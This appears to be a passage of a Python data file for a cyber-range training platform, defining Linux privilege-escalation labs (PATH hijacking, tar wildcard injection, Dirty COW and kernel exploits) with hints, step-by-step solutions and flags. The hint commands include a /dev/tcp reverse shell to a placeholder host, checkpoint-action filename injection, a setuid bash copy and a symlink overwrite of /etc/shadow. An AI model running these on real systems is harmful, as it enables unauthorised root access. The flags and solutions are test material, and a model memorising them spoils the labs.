        "1. Study Dirty COW: race condition in copy-on-write.\n2. Understand: mmap() → write() race → overwrite read-only files.\n3. Research: How do modern kernels mitigate these? (SMEP, SMAP, KASLR)\n4. Study kernel module loading: insmod, modprobe.",
        [("Dirty COW CVE number?", "CVE-2016-5195"), ("Kernel address randomization?", "kaslr")], 75),
    _theory("Expert kernel security — writing kernel exploits and understanding mitigations.",
        "Advanced kernel exploitation and bypass techniques.",
        ["KASLR bypass techniques", "SMEP/SMAP bypass", "ROP in kernel space",
         "eBPF for security and exploitation", "Seccomp for syscall filtering"],
        "1. Study KASLR: randomizes kernel base address.\n2. Bypass: kernel info leak → calculate real addresses.\n3. SMEP: prevents kernel from executing userspace code.\n4. Write a simple kernel module and analyze its security implications.",
        [("Prevents executing userspace code in kernel?", "smep"), ("BPF-based security tool?", "ebpf")], 100)),

505: _m(505, "PATH Variable Exploitation", TYPE_LAB, 2,
    docker_image="linux_gym", container="cybersim_linux_gym",
    easy=_lab("A root-owned script runs 'ls' without absolute path. Hijack PATH to execute your code as root.",
        "Exploit PATH variable to hijack a command executed by a root script.",
        ["Understanding $PATH order", "Creating fake binaries", "PATH prepending"],
        [("check path", "echo $PATH", "View current PATH"),
         ("create fake", "echo '#!/bin/bash\\nbash' > /tmp/ls; chmod +x /tmp/ls", "Create fake ls"),
         ("prepend", "export PATH=/tmp:$PATH", "Put /tmp first in PATH")],
        "STEP 1: Find root script: cat /opt/cleanup.sh → it runs 'ls' without /bin/ls\nSTEP 2: Create fake ls: echo '#!/bin/bash' > /tmp/ls; echo 'bash -p' >> /tmp/ls\nSTEP 3: chmod +x /tmp/ls\nSTEP 4: export PATH=/tmp:$PATH\nSTEP 5: Trigger the root script → your 'ls' runs instead → root shell!\nSTEP 6: Submit flag.",
        "None", "FLAG{p4th_h1j4ck_34sy}", 100),
    normal=_lab("Script uses some absolute paths. Find the one relative command and exploit it.",
        "Analyze the script carefully to find the one exploitable relative command.",
        ["Script analysis", "Selective PATH hijacking", "Understanding bash -p"],
        [("cat script", "cat /opt/backup.sh", "Read the script source"),
         ("identify", "grep -v '^/' /opt/backup.sh", "Find commands without absolute path")],
        "STEP 1: Read the script: cat /opt/backup.sh\nSTEP 2: Most commands use absolute paths (/bin/cp, /bin/tar).\nSTEP 3: Find the ONE relative command (e.g., 'date').\nSTEP 4: Create fake 'date' in /tmp, prepend PATH.\nSTEP 5: Submit flag.",
        "Script monitored for modifications.", "FLAG{h1dd3n_r3l4t1v3_cmd}", 150, defender_config=DC45),
    hard=_lab("All commands use absolute paths. Exploit shared library loading (LD_LIBRARY_PATH) or bash functions.",
        "No PATH exploit — use advanced techniques like library injection or function overriding.",
        ["LD_LIBRARY_PATH hijacking", "Bash function export override", "Shared library preloading"],
        [("LD_LIBRARY_PATH", "export LD_LIBRARY_PATH=/tmp", "Hijack library search"),
         ("bash function", "function /bin/ls { /bin/bash -p; }", "Override even absolute paths"),
         ("ldd", "ldd /opt/backup.sh", "Check shared library dependencies")],
        "STEP 1: All paths are absolute — PATH hijack won't work.\nSTEP 2: Check if LD_LIBRARY_PATH is preserved when script runs.\nSTEP 3: Create malicious shared library in /tmp.\nSTEP 4: Or use bash function export to override commands.\nSTEP 5: Submit flag.",
        "Active Defender — monitors environment variables.",
        "FLAG{l1br4ry_1nj3ct10n_3l1t3}", 200, defender_config=DC120)),

506: _m(506, "Wildcard Injection", TYPE_LAB, 2,
    docker_image="linux_gym", container="cybersim_linux_gym",
    easy=_lab("A cron job runs 'tar czf backup.tar.gz *' in /opt/data. Exploit the wildcard to execute commands.",
        "Use tar wildcard injection to achieve code execution as root.",
        ["tar checkpoint options as filenames", "Wildcard expansion in bash", "Creating malicious filenames"],
        [("checkpoint", "echo '' > '--checkpoint=1'", "Create checkpoint trigger"),
         ("action", "echo '' > '--checkpoint-action=exec=sh shell.sh'", "Execute on checkpoint"),
         ("shell", "echo '#!/bin/bash\\nbash -i >& /dev/tcp/IP/4444 0>&1' > shell.sh", "Payload")],
        "STEP 1: cd /opt/data (where tar runs)\nSTEP 2: Create payload: echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > shell.sh\nSTEP 3: echo '' > '--checkpoint=1'\nSTEP 4: echo '' > '--checkpoint-action=exec=sh shell.sh'\nSTEP 5: Wait for cron → /tmp/rootbash -p → root!\nSTEP 6: Submit flag.",
        "None", "FLAG{t4r_w1ldc4rd_34sy}", 100),
    normal=_lab("Wildcard exploit blocked for tar. Find alternative wildcard-exploitable commands in cron.",
        "Exploit other commands that are vulnerable to wildcard injection.",
        ["rsync wildcard injection", "chown/chmod wildcard tricks", "find with -exec"],
        [("rsync", "echo '' > '-e sh shell.sh'", "rsync -e flag injection"),
         ("chown", "echo '' > '--reference=root_owned_file'", "chown reference trick")],
        "STEP 1: tar checkpoint is patched.\nSTEP 2: Check cron for other wildcard commands (rsync, chown, chmod).\nSTEP 3: rsync: create -e flag file to execute scripts.\nSTEP 4: Submit flag.",
        "Tar checkpoint options blocked.", "FLAG{w1ldc4rd_4lt3rn4t1v3}", 150, defender_config=DC45),
    hard=_lab("All common wildcard exploits patched. Use race conditions or symlink attacks instead.",
        "Advanced exploitation via TOCTOU race conditions and symlinks.",
        ["TOCTOU race condition", "Symlink attacks on temp files", "inotifywait for timing"],
        [("inotifywait", "inotifywait -m /opt/data -e create", "Monitor file creation"),
         ("symlink", "ln -sf /etc/shadow /opt/data/backup.tar.gz", "Redirect output via symlink")],
        "STEP 1: Wildcard exploits are patched.\nSTEP 2: Observe cron timing with inotifywait.\nSTEP 3: Create symlink: ln -sf /etc/shadow /opt/data/output.tar.gz\nSTEP 4: When cron writes to output.tar.gz, it overwrites /etc/shadow.\nSTEP 5: Inject your own password hash. Submit flag.",
        "File integrity monitoring active.",
        "FLAG{r4c3_c0nd1t10n_3l1t3}", 200, defender_config=DC120)),

507: _m(507, "Kernel Exploits", TYPE_LAB, 2,
    docker_image="linux_gym", container="cybersim_linux_gym",
    easy=_lab("The target runs an outdated kernel vulnerable to Dirty COW (CVE-2016-5195). Compile and run the exploit.",
        "Exploit the Dirty COW kernel vulnerability to get root access.",
        ["Checking kernel version (uname -r)", "Downloading and compiling exploits", "Understanding copy-on-write"],
        [("uname", "uname -r", "Check kernel version"),
         ("searchsploit", "searchsploit dirty cow", "Find the exploit"),
         ("compile", "gcc -pthread exploit.c -o exploit -lcrypt", "Compile exploit")],
        "STEP 1: Check kernel: uname -r → look for version < 4.8.3\nSTEP 2: Download exploit: searchsploit -m 40839\nSTEP 3: Compile: gcc -pthread 40839.c -o dirty -lcrypt\nSTEP 4: Run: ./dirty\nSTEP 5: Wait for exploit to complete → root access!\nSTEP 6: Submit flag.",
        "None — Vulnerable kernel.", "FLAG{d1rty_c0w_r00t}", 100),
    normal=_lab("Kernel is slightly newer but still vulnerable to a different CVE. Find and exploit it.",
        "Research the kernel version and find the appropriate exploit.",
        ["Kernel CVE research", "linux-exploit-suggester", "Adapting exploits for target"],
        [("suggester", "./linux-exploit-suggester.sh", "Auto-suggest kernel exploits"),
         ("uname -a", "uname -a", "Full kernel info"),
         ("gcc", "gcc exploit.c -o exploit", "Compile for target architecture")],
        "STEP 1: uname -a for full kernel details.\nSTEP 2: Run linux-exploit-suggester.sh\nSTEP 3: Research suggested CVEs — verify applicability.\nSTEP 4: Download, compile, execute the exploit.\nSTEP 5: Submit flag.",
        "Kernel module loading monitored.", "FLAG{k3rn3l_3xpl01t_pr0}", 150, defender_config=DC45),
    hard=_lab("Modern kernel with protections. Use return-oriented programming or eBPF exploits.",
        "Bypass modern kernel mitigations (SMEP, SMAP, KASLR) to achieve root.",
        ["KASLR info leak techniques", "ROP chain in kernel", "eBPF verifier bypass", "Namespace escape"],
        [("dmesg", "dmesg | grep -i kaslr", "Check if KASLR enabled"),
         ("proc", "cat /proc/version", "Detailed kernel version"),
         ("kallsyms", "cat /proc/kallsyms | head", "Kernel symbol addresses (if readable)")],
        "STEP 1: Modern kernel — basic exploits won't work.\nSTEP 2: Check mitigations: SMEP, SMAP, KASLR status.\nSTEP 3: Find info leak: dmesg, /proc/kallsyms access.\nSTEP 4: Use leaked addresses to build ROP chain.\nSTEP 5: Execute kernel exploit with ROP. Submit flag.",
        "Full kernel hardening. Active monitoring.",
        "FLAG{k3rn3l_r0p_m4st3r}", 200, defender_config=DC120)),
}
